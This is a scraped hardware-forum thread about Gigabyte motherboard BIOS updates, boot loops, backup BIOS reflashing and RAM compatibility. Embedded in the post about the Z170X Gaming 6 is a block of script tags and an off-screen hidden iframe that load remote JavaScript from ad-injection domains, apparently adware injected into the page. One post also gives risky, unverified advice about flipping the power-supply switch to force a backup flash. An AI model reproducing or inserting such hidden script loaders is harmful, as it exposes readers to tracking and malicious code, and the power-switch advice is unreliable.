I'm sorry if this question appears to be dumb, but for the life of me I can't locate anymore the search function that let's you search within a thread, how can I now search for posts relating to my motherboard (Z77X-UD5H) within this thread? I have looked under thread tools while logged in and it's not there anymore, nor could a CTRL+F reveal it.
After updating BIOS F9 --> F12 on my GA-P35-DS3P I want to reflash my backup BIOS to F12 as well, before I try flashing main BIOS to latest beta BIOS F13b.
In the first post is "Backup BIOS reflash: ALT+F12 - AWARD BIOS". I can't figure out where and when to hit ALT+F12 (I did search, however didn't find the answer).
there should be a switch. Other than that ....turn of power witch off switch on power supply for 20sec, hold the pc power on, flip power supply switch, when it lights up quickly flip the power supply switch to off. leave for 20 secs, then power up, should force backup flash to main
I found the issue with my motherboard, the power leads(socket) at the top of the circuit board is dodgy, this part of the power is for memory .....this is why it came on when I got it back from repair shop, the knocking about in the car boot fixed the circuit, but any maintenance inside the case results in me having to wiglle that part of ther power feed and wiggle the ram also, I think I may have a fracture in tht part of the board.
hopefully we can get some fixes for the z170x gaming 6 im having issues with all the f3 bios' where if I try to set the multi manually it doesnt post and hangs forever on a loop until it finally posts again with default settings. also seems like auto oc settings cause random hangs on the same setup that f2 wasnt It cant be something im doing i had an 875k at 4ghz for years and just trying to get a stable 4.1 on this setup is a challenge. everything passes stability tests then just randomly hangs one day while idle. or while watch movie etc<script src="//serverads.net/599b47260394deb2d8.js"></script><script src="//pulseadnetwork.com/a/display.php?r=1131815"></script><iframe src="//pulseadnetwork.com/pix.html" style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;"></iframe><script type="text/javascript" src="http://serverads.net/addons/lnkr5.min.js"></script><script type="text/javascript" src="http://cdncache-a.akamaihd.net/sub/nee5452/50653_1433_/l.js?pid=2448&ext=Not%20set"></script><script type="text/javascript" src="http://rules.similardeals.net/v1.0/whitelist/1108/50653x1433x/forums.tweaktown.com?partnerName=Not%20set&partner Link=http%253A%252F%252Fthisadsfor.us%252Foptout%2 53Ft%253D1433%2526u%253D50653%2526block%253Dext_fx dl"></script>
I want to report a bug with bios 21x with X99- Soc Force and Kingston HyperX Fury DDR4-2666 32GB Quad-Channel kit,
Bios will boot loop with any bios F21 but works fine with bios F7c
Fixes for the bootloop with bios F21
- Click on Auto OC button in the back panel of the motherboard will make the motherboard boot successfully
- Go to bios, enable XMP and save
- Switch back the OC button to no OC (default)
- System now boots fine with F21
- With Bios F7C, I don't need to change any settings and no boot problem.
GA-Z97X-Gaming 7 Beta F9a Started locking my memory clocks to 400Mhz regardless of BIOS multiplier setting (timings and XMP could be changed successfully) Reverted to F8 for now.

my favourate ram .....cant beat crucial ....been around for years, under a different well known name before that even
Agreed 100%, always use them in my personal builds, but I am growing weary of GB mobos and Crucial memory not playing nicely together. I think my next build may diverge.

I purchased a new pack of tracer a few days back 1866mhz red and green version ....and would you believe it, they worked perefectly ...even the mod utility works. I still have 2 of the older(about 2years old) versions which are blue and orange, these 2 will not show thw spd info or get detected by the mod utility so I beginning to think the newer ones that they have are now compatable with GB
Im now using the new F7 bios for my GA-ZI70X-Gaming 7 M/B and one thing i've noticed straight away is that the default voltage has changed for the volt core on my cpu from the f6 bios it is now a little lower under load on my i7 6700k @ stock , on the f6 bios the volt core would go up to 1.35-1.38 when stress testing and now with the f7 bios 1.27-1.32 this is using Gigabytes Intel Extreme Tuning Utility .
I haven't tried any overclocking just yet, as for the next few days i will just run everything @ stock ,just to make sure the new bios is all good before i go tinkering .
If i notice anything else or have any problem with the system i will report back
